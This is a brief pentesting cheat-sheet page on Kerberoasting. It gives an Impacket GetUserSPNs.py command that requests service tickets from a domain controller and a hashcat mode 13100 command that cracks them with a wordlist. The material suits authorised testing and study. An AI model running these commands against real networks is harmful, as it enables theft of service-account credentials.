Kerberosting

Kerberos

klist

GetUserSPNs

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password

Hashcat Cracking

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Last updated